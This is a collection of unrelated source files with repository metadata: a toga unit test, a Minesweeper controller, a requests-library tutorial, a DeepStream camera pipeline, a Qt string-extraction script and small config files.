helpers.writeListOfSimilarDictToCsv(agentDatapointsAndMappingsDictList, dataSourceFileName, replaceList)
#Print out list of all neutral IDs
if logging in ("VERBOSE"):
lookUpNeutralId()
|
[
"noreply@github.com"
] |
mindsphere.noreply@github.com
|
7abe62c7ef0dcbe1c054939532683e3efd1c42ac
|
a3f683085685cb683aa38be2699ffae67089f863
|
/core/tests/sources/test_source.py
|
5968f46bdd6aee7e8ba5a0ae9923afdb8aae73a3
|
[
"BSD-3-Clause"
] |
permissive
|
saroad2/toga
|
094d763b3b129ded3a96692eed27709629dc61fc
|
3af18a5658aa75b551ed11da9b49d5b90de7855b
|
refs/heads/main
| 2023-01-28T01:25:31.300635
| 2022-11-14T01:33:22
| 2022-11-14T01:33:22
| 246,352,111
| 0
| 0
|
BSD-3-Clause
| 2023-09-10T20:15:27
| 2020-03-10T16:28:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
from unittest import TestCase
from unittest.mock import Mock
from toga.sources import Source
class SourceTests(TestCase):
def test_listeners(self):
listener1 = Mock()
source = Source()
source.add_listener(listener1)
self.assertListEqual(source.listeners, [listener1])
# activate listener
source._notify("message1")
listener1.message1.assert_called_once_with()
# activate listener with data
source._notify("message2", arg1=11, arg2=22)
listener1.message2.assert_called_once_with(arg1=11, arg2=22)
# add more widgets to listeners
listener2 = Mock()
source.add_listener(listener2)
self.assertListEqual(source.listeners, [listener1, listener2])
# activate listener
source._notify("message3")
listener1.message3.assert_called_once_with()
listener2.message3.assert_called_once_with()
# activate listener with data
source._notify("message4", arg1=11, arg2=22)
listener1.message4.assert_called_once_with(arg1=11, arg2=22)
listener2.message4.assert_called_once_with(arg1=11, arg2=22)
# remove from listeners
source.remove_listener(listener2)
self.assertListEqual(source.listeners, [listener1])
def test_missing_listener_method(self):
listener1 = object()
source = Source()
source.add_listener(listener1)
# This shouldn't raise an error
source._notify("message1")
|
[
"russell@keith-magee.com"
] |
russell@keith-magee.com
|
4a930183b499dfb6de14e5c00be6746627ad3141
|
a053f5be4356290f693704ffa5b8c4c9d45dd14c
|
/venv/bin/wheel
|
b29715d18c54d6d6c374c4d00b5e8b59fb6738fb
|
[] |
no_license
|
troupn/hellowebdjango
|
713f5631c5d4a4c23ec00e01432c05903359e7f7
|
bc986a0053f759c8b3f3166879c13797b58929d6
|
refs/heads/master
| 2021-01-22T03:23:10.527308
| 2017-02-06T21:04:05
| 2017-02-06T21:04:05
| 81,119,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
#!/home/ubuntu/workspace/projects/myhellowebapp/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ngtroup@gmail.com"
] |
ngtroup@gmail.com
|
|
dd4760af44ded3a8c110c95124a335213cb587af
|
d5c339150b74b7023177d4c039604a9018704e9d
|
/src/GameController.py
|
196deecc28f7e877c6d6c72f12c555c45b11595e
|
[] |
no_license
|
haihoangtran/MineSweeper
|
d488137d13c1079485513c5f5d8ab37d90db884c
|
451e4c1dae606a9c8c26e69926e09ef9f0cd00da
|
refs/heads/master
| 2020-08-07T06:27:37.969458
| 2014-03-11T01:23:06
| 2014-03-11T01:23:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
class GameController():
def __init__(self):
self.SIZE = 10
(self.SEALED, self.EXPOSED, self.UNEXPOSED) = range(0, 3)
self.cellStatus = [[ 0 for i in range(self.SIZE) ] for j in range(self.SIZE)]
self.cellMined = [[0 for i in range (self.SIZE)] for j in range (self.SIZE)]
for x in range (self.SIZE):
for y in range (self.SIZE):
self.cellStatus[x][y] = self.UNEXPOSED
self.cellMined[x][y] = False
def getSize(self):
return self.SIZE
def isExposed(self, x, y):
return self.cellStatus[x][y] == self.EXPOSED
def isSealed(self, x, y):
return self.cellStatus[x][y] == self.SEALED
def isUnexposed(self, x, y):
return self.cellStatus[x][y] == self.UNEXPOSED
def setMine (self, x, y):
self.cellMined[x][y] = True
def exposeCell(self,x,y):
if (self.cellStatus[x][y] == self.UNEXPOSED):
self.cellStatus[x][y] = self.EXPOSED
return True
else:
return False
def toggleSeal(self, x, y):
if self.cellStatus[x][y] != self.EXPOSED:
if self.cellStatus[x][y] == self.SEALED:
self.cellStatus[x][y] = self.UNEXPOSED
elif self.cellStatus[x][y] == self.UNEXPOSED:
self.cellStatus[x][y] = self.SEALED
return True
else:
return False
def countMines(self, x, y):
counter = 0
for adjX in range (-1, 2):
for adjY in range (-1, 2):
if (x + adjX) in range (self.SIZE) and (y + adjY) in range (self.SIZE):
if self.cellMined[x + adjX][y + adjY] == True:
counter += 1
return counter
def isGameOver(self, x, y):
return self.cellStatus[x][y] == self.EXPOSED and self.cellMined[x][y] == True
def recursiveExposeEmptyCells(self, x, y):
if self.isSealed(x, y) == False:
self.exposeCell(x,y)
for adjX in range (-1, 2):
for adjY in range (-1, 2):
neighborX = x + adjX
neighborY = y + adjY
if (neighborX) in range (self.SIZE) and (neighborY) in range (self.SIZE):
if self.cellStatus[neighborX][neighborY] == self.UNEXPOSED and self.cellMined[neighborX][neighborY] == False:
if self.countMines(neighborX, neighborY) > 0:
self.exposeCell(neighborX,neighborY)
elif self.countMines(neighborX, neighborY) == 0:
self.recursiveExposeEmptyCells(neighborX, neighborY)
def winGame(self):
won = True
for x in range (self.SIZE):
for y in range (self.SIZE):
if(self.cellMined[x][y] == False and self.cellStatus[x][y] == self.UNEXPOSED) or (self.cellMined[x][y] == True and self.cellStatus[x][y] != self.SEALED):
won = False
break
return won
|
[
"hai.hg.tran@gmail.com"
] |
hai.hg.tran@gmail.com
|
bd01e38be226912fc3889a352c1d816e2857ecd7
|
2bbdd0c00080c4d27253df8722fb3e0b053bd63f
|
/Python/Machine Learning/Regression/Section 4 - Simple Linear Regression/simple_linear.py
|
e759684e3b308e25387fbeaeb9dd9e34b5d623d8
|
[
"MIT"
] |
permissive
|
urbrob/programming
|
3c005802a5d286dfe1fc8c3e31e36677a5523ad2
|
b9374fa6dca08504d6bb67c5db9fdf41a4d0d9f7
|
refs/heads/master
| 2020-04-06T07:57:50.486444
| 2020-03-05T08:17:22
| 2020-03-05T08:17:22
| 157,290,643
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 518
|
py
|
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
dataset = pd.read_csv('Salary_Data.csv')
x = dataset.iloc[:, :-1]
y = dataset.iloc[:, -1]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=1/3, random_state=0)
regressor = LinearRegression()
regressor.fit(x_train, y_train)
predicted_values = regressor.predict(x_test)
plt.plot(x_test, y_test, 'r+', x_test, predicted_values, 'b')
plt.show()
|
[
"urb.rob@o2.pl"
] |
urb.rob@o2.pl
|
d3d73a376e90dd88ea2bf700467fc93bb559085d
|
18d0d1e6e121928d9542def6c60d3089ac834d50
|
/.c9/metadata/environment/products/urls.py
|
90abd99bbe3407fb606f84eb0f638e28b7229f8d
|
[] |
no_license
|
JackSnowdon/stripe-test
|
31990f7f73be490d282fa0f23ab1acf373415d02
|
b2729de4eb0c908d5b1c359d29dc347f16cf388d
|
refs/heads/master
| 2023-01-04T08:09:56.693969
| 2019-06-27T11:11:45
| 2019-06-27T11:11:45
| 192,900,409
| 0
| 0
| null | 2022-11-22T02:09:57
| 2019-06-20T10:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 418
|
py
|
{"filter":false,"title":"urls.py","tooltip":"/products/urls.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":5,"column":1},"end":{"row":5,"column":1},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1561046082475,"hash":"b604cecf7240f1919bff499f7d2e250c28ef329d"}
|
[
"jacksnowdondrums@gmail.com"
] |
jacksnowdondrums@gmail.com
|
5d798c8e283b24e5f08402137f1a6bb81c96ba24
|
7546f5995ffab909ccd87da8576461bdc58951c1
|
/pachong/爬虫/Study/requeststest.py
|
fe99ef739ed62a403a2928acdb550772157814af
|
[] |
no_license
|
wskai1/Python_Study
|
fa6f818df3de31a37272dc013004cc982d61a6c1
|
72e668e94e3bc6b769dfc103ac62fa387d733306
|
refs/heads/master
| 2020-03-25T01:42:26.553100
| 2018-08-06T09:48:51
| 2018-08-06T09:48:51
| 143,252,364
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,451
|
py
|
import json
import requests
import urllib3
from requests import ReadTimeout, RequestException
from requests.auth import HTTPBasicAuth
response = requests.get("https://www.baidu.com")
print("response类型:",end="")
print(type(response))
print("response状态码:",end="")
print(response.status_code)
print(type(response.text))
print("网页源代码")
print(response.text)
print(response.cookies)
print(response.content)
print(response.content.decode("utf-8"))
# 各种请求
requests.post("http://httpbin.org/post")
requests.put("http://httpbin.org/put")
requests.delete("http://httpbin.org/delete")
requests.head("http://httpbin.org/get")
requests.options("http://httpbin.org/get")
# get请求
response = requests.get("http://httpbin.org/get?name=zhaofan&age=23")
print(response.text)
import requests
data = {
"name":"zhaofan",
"age":22
}
response = requests.get("http://httpbin.org/get",params=data)
print(response.url)
print(response.text)
# 解析JSON
response = requests.get("http://httpbin.org/get")
print(type(response.text))
print(response.json())
print(json.loads(response.text))
print(type(response.json()))
# 直接访问知乎
response =requests.get("https://www.zhihu.com")
print(response.text)
# 带headers访问知乎
import requests
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}
response =requests.get("https://www.zhihu.com",headers=headers)
print(response.text)
# POST请求
data = {
"name":"zhaofan",
"age":23
}
response = requests.post("http://httpbin.org/post",data=data)
print(response.text)
# ssl验证
urllib3.disable_warnings()
response = requests.get("https://www.12306.cn",verify=False)
print(response.status_code)
# 代理IP
proxies= {
"http":"http://127.0.0.1:9999",
"https":"http://127.0.0.1:8888"
}
response = requests.get("https://www.baidu.com",proxies=proxies)
print(response.text)
# 异常处理
try:
response = requests.get("http://httpbin.org/get",timout=0.1)
print(response.status_code)
except ReadTimeout:
print("timeout")
except ConnectionError:
print("connection Error")
except RequestException:
print("error")
# 认证
response = requests.get("http://120.27.34.24:9001/",auth=HTTPBasicAuth("user","123"))
print(response.status_code)
response = requests.get("http://120.27.34.24:9001/",auth=("user","123"))
print(response.status_code)
|
[
"1729253813@qq.com"
] |
1729253813@qq.com
|
23eddcdcd6ae4cd6ef40bafc0337d44138959fd7
|
b55cfd21e25a6bf4df4eb9cffff0e005ace9badf
|
/self_assessment.py
|
4234369e3566366505a08dd3ccba54fca81d101c
|
[] |
no_license
|
margunwa123/peer_assessment_calculator
|
c2d57ca7e4c98ba064320cae342c8d7bb62b8c2c
|
40a382800772e2d307481ef09762ec6f37cb3a8e
|
refs/heads/master
| 2023-01-24T12:45:44.013360
| 2020-12-11T08:25:37
| 2020-12-11T08:25:37
| 317,132,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
# py self_assessment.py {nama_file csv} {list NIM orang}
import csv
import sys
from constant import *
def getSelfAssessment(nim):
with open(sys.argv[1]) as csv_file:
for row in csv.reader(csv_file):
if(row[NIM] == nim):
print(f"Self assessment nim {nim} adalah {row[NILAI_SENDIRI]}")
break
if __name__ == "__main__":
listNIM = sys.argv[2].split(",")
for nim in listNIM:
getSelfAssessment(nim)
|
[
"13518114@std.stei.itb.ac.id"
] |
13518114@std.stei.itb.ac.id
|
7c86499fe37f63ec047435d257414eea36444b04
|
0547d1826e99eedb959a3463520d73985a3b844e
|
/Data Analyst with Python Track/05-Introduction to Data Visualization with Matplotlib/02- Plotting time-series/04-Plotting two variables.py
|
a39c962585de865637f7454937f881c5fc655682
|
[] |
no_license
|
abhaysinh/Data-Camp
|
18031f8fd4ee199c2eff54a408c52da7bdd7ec0f
|
782c712975e14e88da4f27505adf4e5f4b457cb1
|
refs/heads/master
| 2022-11-27T10:44:11.743038
| 2020-07-25T16:15:03
| 2020-07-25T16:15:03
| 282,444,344
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,505
|
py
|
'''
Plotting two variables
If you want to plot two time-series variables that were recorded at the same times, you can add both of them to the same subplot.
If the variables have very different scales, you'll want to make sure that you plot them in different twin Axes objects. These objects can share one axis (for example, the time, or x-axis) while not sharing the other (the y-axis).
To create a twin Axes object that shares the x-axis, we use the twinx method.
In this exercise, you'll have access to a DataFrame that has the climate_change data loaded into it. This DataFrame was loaded with the "date" column set as a DateTimeIndex, and it has a column called "co2" with carbon dioxide measurements and a column called "relative_temp" with temperature measurements.
Instructions
100 XP
Use plt.subplots to create a Figure and Axes objects called fig and ax, respectively.
Plot the carbon dioxide variable in blue using the Axes plot method.
Use the Axes twinx method to create a twin Axes that shares the x-axis.
Plot the relative temperature variable in the twin Axes using its plot method.
'''
import matplotlib.pyplot as plt
# Initalize a Figure and Axes
fig, ax = plt.subplots()
# Plot the CO2 variable in blue
ax.plot(climate_change.index, climate_change["co2"], color='blue')
# Create a twin Axes that shares the x-axis
ax2 = ax.twinx()
# Plot the relative temperature in red
ax2.plot(climate_change.index, climate_change["relative_temp"], color='red')
plt.show()
|
[
"abhaysinh.surve@gmail.com"
] |
abhaysinh.surve@gmail.com
|
df39214fb6f2973cd79d9e5a1575d63504485a39
|
b4d9ad08313a975e2a4c2a70140a548812d50850
|
/apps/deepstream-test1-usbcam/deepstream_test_1_usb.py
|
564deea6064f1157d12aca66cd1bbbfb67a03dac
|
[
"MIT"
] |
permissive
|
culebracut/ds-vs
|
06a00274684df6f60f5e852d364b7fcd5b6deacd
|
d71493539d4934b86057b87bf15d80b033ddb2fe
|
refs/heads/master
| 2022-11-07T15:59:45.301898
| 2020-06-25T17:46:19
| 2020-06-25T17:46:19
| 272,830,988
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,312
|
py
|
#!/usr/bin/env python3
################################################################################
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
################################################################################
import sys
sys.path.append('../')
import gi
gi.require_version('Gst', '1.0')
from gi.repository import GObject, Gst
from common.is_aarch_64 import is_aarch64
from common.bus_call import bus_call
import pyds
#from bindings.jetson import pyds
PGIE_CLASS_ID_VEHICLE = 0
PGIE_CLASS_ID_BICYCLE = 1
PGIE_CLASS_ID_PERSON = 2
PGIE_CLASS_ID_ROADSIGN = 3
def osd_sink_pad_buffer_probe(pad,info,u_data):
frame_number=0
#Intiallizing object counter with 0.
obj_counter = {
PGIE_CLASS_ID_VEHICLE:0,
PGIE_CLASS_ID_PERSON:0,
PGIE_CLASS_ID_BICYCLE:0,
PGIE_CLASS_ID_ROADSIGN:0
}
num_rects=0
gst_buffer = info.get_buffer()
if not gst_buffer:
print("Unable to get GstBuffer ")
return
# Retrieve batch metadata from the gst_buffer
# Note that pyds.gst_buffer_get_nvds_batch_meta() expects the
# C address of gst_buffer as input, which is obtained with hash(gst_buffer)
batch_meta = pyds.gst_buffer_get_nvds_batch_meta(hash(gst_buffer))
l_frame = batch_meta.frame_meta_list
while l_frame is not None:
try:
# Note that l_frame.data needs a cast to pyds.NvDsFrameMeta
# The casting is done by pyds.NvDsFrameMeta.cast()
# The casting also keeps ownership of the underlying memory
# in the C code, so the Python garbage collector will leave
# it alone.
frame_meta = pyds.NvDsFrameMeta.cast(l_frame.data)
except StopIteration:
break
frame_number=frame_meta.frame_num
num_rects = frame_meta.num_obj_meta
l_obj=frame_meta.obj_meta_list
while l_obj is not None:
try:
# Casting l_obj.data to pyds.NvDsObjectMeta
obj_meta=pyds.NvDsObjectMeta.cast(l_obj.data)
except StopIteration:
break
obj_counter[obj_meta.class_id] += 1
try:
l_obj=l_obj.next
except StopIteration:
break
# Acquiring a display meta object. The memory ownership remains in
# the C code so downstream plugins can still access it. Otherwise
# the garbage collector will claim it when this probe function exits.
display_meta=pyds.nvds_acquire_display_meta_from_pool(batch_meta)
display_meta.num_labels = 1
py_nvosd_text_params = display_meta.text_params[0]
# Setting display text to be shown on screen
# Note that the pyds module allocates a buffer for the string, and the
# memory will not be claimed by the garbage collector.
# Reading the display_text field here will return the C address of the
# allocated string. Use pyds.get_string() to get the string content.
py_nvosd_text_params.display_text = "Frame Number={} Number of Objects={} Vehicle_count={} Person_count={}".format(frame_number, num_rects, obj_counter[PGIE_CLASS_ID_VEHICLE], obj_counter[PGIE_CLASS_ID_PERSON])
# Now set the offsets where the string should appear
py_nvosd_text_params.x_offset = 10
py_nvosd_text_params.y_offset = 12
# Font , font-color and font-size
py_nvosd_text_params.font_params.font_name = "Serif"
py_nvosd_text_params.font_params.font_size = 10
# set(red, green, blue, alpha); set to White
py_nvosd_text_params.font_params.font_color.set(1.0, 1.0, 1.0, 1.0)
# Text background color
py_nvosd_text_params.set_bg_clr = 1
# set(red, green, blue, alpha); set to Black
py_nvosd_text_params.text_bg_clr.set(0.0, 0.0, 0.0, 1.0)
# Using pyds.get_string() to get display_text as string
print(pyds.get_string(py_nvosd_text_params.display_text))
pyds.nvds_add_display_meta_to_frame(frame_meta, display_meta)
try:
l_frame=l_frame.next
except StopIteration:
break
return Gst.PadProbeReturn.OK
def main(args):
# Check input arguments
if len(args) < 2:
sys.stderr.write("usage: %s <v4l2-device-path>\n" % args[0])
sys.exit(1)
# TODO: use parsing
width = int(args[3])
height = int(args[5])
# Standard GStreamer initialization
GObject.threads_init()
Gst.init(None)
# Create gstreamer elements
# Create Pipeline element that will form a connection of other elements
print("Creating Pipeline \n ")
pipeline = Gst.Pipeline()
if not pipeline:
sys.stderr.write(" Unable to create Pipeline \n")
# Source element for reading from the file
print("Creating Source \n ")
source = Gst.ElementFactory.make("v4l2src", "usb-cam-source")
if not source:
sys.stderr.write(" Unable to create Source \n")
caps_v4l2src = Gst.ElementFactory.make("capsfilter", "v4l2src_caps")
if not caps_v4l2src:
sys.stderr.write(" Unable to create v4l2src capsfilter \n")
print("Creating Video Converter \n")
# Adding videoconvert -> nvvideoconvert as not all
# raw formats are supported by nvvideoconvert;
# Say YUYV is unsupported - which is the common
# raw format for many logi usb cams
# In case we have a camera with raw format supported in
# nvvideoconvert, GStreamer plugins' capability negotiation
# shall be intelligent enough to reduce compute by
# videoconvert doing passthrough (TODO we need to confirm this)
# videoconvert to make sure a superset of raw formats are supported
vidconvsrc = Gst.ElementFactory.make("videoconvert", "convertor_src1")
if not vidconvsrc:
sys.stderr.write(" Unable to create videoconvert \n")
# nvvideoconvert to convert incoming raw buffers to NVMM Mem (NvBufSurface API)
nvvidconvsrc = Gst.ElementFactory.make("nvvideoconvert", "convertor_src2")
if not nvvidconvsrc:
sys.stderr.write(" Unable to create Nvvideoconvert \n")
caps_vidconvsrc = Gst.ElementFactory.make("capsfilter", "nvmm_caps")
if not caps_vidconvsrc:
sys.stderr.write(" Unable to create capsfilter \n")
# Create nvstreammux instance to form batches from one or more sources.
streammux = Gst.ElementFactory.make("nvstreammux", "Stream-muxer")
if not streammux:
sys.stderr.write(" Unable to create NvStreamMux \n")
# Use nvinfer to run inferencing on camera's output,
# behaviour of inferencing is set through config file
pgie = Gst.ElementFactory.make("nvinfer", "primary-inference")
if not pgie:
sys.stderr.write(" Unable to create pgie \n")
# Use convertor to convert from NV12 to RGBA as required by nvosd
nvvidconv = Gst.ElementFactory.make("nvvideoconvert", "convertor")
if not nvvidconv:
sys.stderr.write(" Unable to create nvvidconv \n")
# Create OSD to draw on the converted RGBA buffer
nvosd = Gst.ElementFactory.make("nvdsosd", "onscreendisplay")
if not nvosd:
sys.stderr.write(" Unable to create nvosd \n")
# Finally render the osd output
if is_aarch64():
transform = Gst.ElementFactory.make("nvegltransform", "nvegl-transform")
print("Creating EGLSink \n")
sink = Gst.ElementFactory.make("nveglglessink", "nvvideo-renderer")
if not sink:
sys.stderr.write(" Unable to create egl sink \n")
print("Playing cam %s " %args[1])
caps_v4l2src.set_property('caps', Gst.Caps.from_string("video/x-raw, framerate=30/1"))
caps_vidconvsrc.set_property('caps', Gst.Caps.from_string("video/x-raw(memory:NVMM)"))
source.set_property('device', args[1])
streammux.set_property('width', width)
streammux.set_property('height', height)
streammux.set_property('batch-size', 1)
streammux.set_property('batched-push-timeout', 4000000)
pgie.set_property('config-file-path', "dstest1_pgie_config.txt")
# Set sync = false to avoid late frame drops at the display-sink
sink.set_property('sync', False)
print("Adding elements to Pipeline \n")
pipeline.add(source)
pipeline.add(caps_v4l2src)
pipeline.add(vidconvsrc)
pipeline.add(nvvidconvsrc)
pipeline.add(caps_vidconvsrc)
pipeline.add(streammux)
pipeline.add(pgie)
pipeline.add(nvvidconv)
pipeline.add(nvosd)
pipeline.add(sink)
if is_aarch64():
pipeline.add(transform)
# we link the elements together
# v4l2src -> nvvideoconvert -> mux ->
# nvinfer -> nvvideoconvert -> nvosd -> video-renderer
print("Linking elements in the Pipeline \n")
source.link(caps_v4l2src)
caps_v4l2src.link(vidconvsrc)
vidconvsrc.link(nvvidconvsrc)
nvvidconvsrc.link(caps_vidconvsrc)
sinkpad = streammux.get_request_pad("sink_0")
if not sinkpad:
sys.stderr.write(" Unable to get the sink pad of streammux \n")
srcpad = caps_vidconvsrc.get_static_pad("src")
if not srcpad:
sys.stderr.write(" Unable to get source pad of caps_vidconvsrc \n")
srcpad.link(sinkpad)
streammux.link(pgie)
pgie.link(nvvidconv)
nvvidconv.link(nvosd)
if is_aarch64():
nvosd.link(transform)
transform.link(sink)
else:
nvosd.link(sink)
# create an event loop and feed gstreamer bus mesages to it
loop = GObject.MainLoop()
bus = pipeline.get_bus()
bus.add_signal_watch()
bus.connect ("message", bus_call, loop)
# Lets add probe to get informed of the meta data generated, we add probe to
# the sink pad of the osd element, since by that time, the buffer would have
# had got all the metadata.
osdsinkpad = nvosd.get_static_pad("sink")
if not osdsinkpad:
sys.stderr.write(" Unable to get sink pad of nvosd \n")
osdsinkpad.add_probe(Gst.PadProbeType.BUFFER, osd_sink_pad_buffer_probe, 0)
# start play back and listen to events
print("Starting pipeline \n")
pipeline.set_state(Gst.State.PLAYING)
try:
loop.run()
except:
pass
# cleanup
pipeline.set_state(Gst.State.NULL)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
[
"foobar.warren@gmail.com"
] |
foobar.warren@gmail.com
|
d2bf098633aa22056182a33f65addd7a365598bb
|
97763df96bc21d91e46e3a98f9ee2b55f557035e
|
/share/qt/extract_strings_qt.py
|
f918851dc4a9feea1b425647bab2e4bb017feb84
|
[
"MIT"
] |
permissive
|
jaagcoin/JAAGCoin-Core
|
2f0138c38e28b98878bbcd5f011ab84d1441bb57
|
87073dbff406e2d95a6e9d81521973c3c8cef350
|
refs/heads/master
| 2020-03-26T05:34:39.790028
| 2018-08-30T15:46:16
| 2018-08-30T15:46:16
| 144,563,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,691
|
py
|
#!/usr/bin/env python
# Copyright (c) 2012-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Extract _("...") strings for translation and convert to Qt stringdefs so that
they can be picked up by Qt linguist.
'''
from __future__ import division,print_function,unicode_literals
from subprocess import Popen, PIPE
import operator
import os
import sys
OUT_CPP="qt/jaagstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
if not XGETTEXT:
print('Cannot extract strings: xgettext utility is not installed or not configured.',file=sys.stderr)
print('Please install package "gettext" and re-run \'./configure\'.',file=sys.stderr)
exit(1)
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out.decode('utf-8'))
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings_qt.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *jaag_strings[] = {\n')
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('PACKAGE_NAME'),))
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS'),))
if os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION') != os.getenv('PACKAGE_NAME'):
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION'),))
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("jaag-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
[
"dmitriy@Dmitriys-iMac.local"
] |
dmitriy@Dmitriys-iMac.local
|
7825a87559141ba84ef6acaf295452b051a8cb7d
|
ff268c31f10cbd3e1c44261ca65a45c88ed3dae5
|
/Bayesian Networks/belief propagation/conf.py
|
2f40682278443925575581c90e1ac1cd016fc216
|
[
"MIT"
] |
permissive
|
gyani91/Machine-Learning
|
6642c65359ed48b212a0f4296f5ce908ed6e95e3
|
2fabaa6386d3be24e56aaa9a19d58cd19d225198
|
refs/heads/master
| 2023-05-27T10:25:55.222053
| 2023-05-15T18:12:45
| 2023-05-15T18:12:45
| 114,811,646
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
EDGE_COLOR = '#bbbbbb'
EDGE_WIDTH = 2
NODE_SIZE = 3000
NODE_BORDER_COLOR = EDGE_COLOR
NODE_BORDER_WIDTH = 3
NODE_COLOR_NORMAL = '#3492d9'
NODE_COLOR_SOURCE = '#2cb64e'
NODE_COLOR_OBSERVED = '#d96b34'
NODE_COLOR_REACHABLE = NODE_COLOR_SOURCE
NODE_SHAPE_SOURCE = 'd'
LABEL_COLOR = '#111111'
FACTOR_NODE_SIZE = 300
FACTOR_NODE_COLOR = '#fdae61'
FACTOR_NODE_SHAPE = 's'
AXIS_OBSERVED_BG_COLOR = '#d9c4ad'
|
[
"noreply@github.com"
] |
gyani91.noreply@github.com
|
21c1131b3a3c7b8405b92c8d65312c7524c3c66d
|
66809511847afd8a1469ba6600f3344b9e1fe3e7
|
/nanoauto/__init__.py
|
c00f05dbfec46a6dd41177a8f395f8b8d6ca3f38
|
[
"MIT"
] |
permissive
|
moshez/nanoauto
|
a621d2e3f8fde0feacd6a63ab8cf9a1471152a87
|
bad407ae4bfb465ba5d137f19e6291c7f8ffe36d
|
refs/heads/master
| 2016-09-05T22:09:23.810662
| 2015-03-23T03:27:12
| 2015-03-23T03:27:12
| 32,709,059
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
__version__ = '0.0.1-dev'
metadata = dict(
name='nanoauto',
version=__version__,
description='Web-based editor',
long_description="""\
nanoauto: write-only web editor
""",
author='Moshe Zadka',
author_email='zadka.moshe@gmail.com',
license='MIT',
copyright='2015',
)
|
[
"zadka.moshe@gmail.com"
] |
zadka.moshe@gmail.com
|
8d4bbe5ecb6a28987891b8d10b5ff34b924e3995
|
422d46ecde4b29ee2c34f1a2a30ba0417a33220f
|
/catkin_ws/build/turtlebot3/turtlebot3_bringup/catkin_generated/pkg.develspace.context.pc.py
|
0a2c7bbb047d769edc2577143f9b99f030a5fb20
|
[] |
no_license
|
biniamzerai/BusBot
|
68cf39f947a468b02b08ed1baad5afaf838a61e9
|
8522ba21d98f909ca29ddfd41b6047acc7f97691
|
refs/heads/master
| 2021-01-07T16:18:04.682683
| 2020-01-26T01:33:58
| 2020-01-26T01:33:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
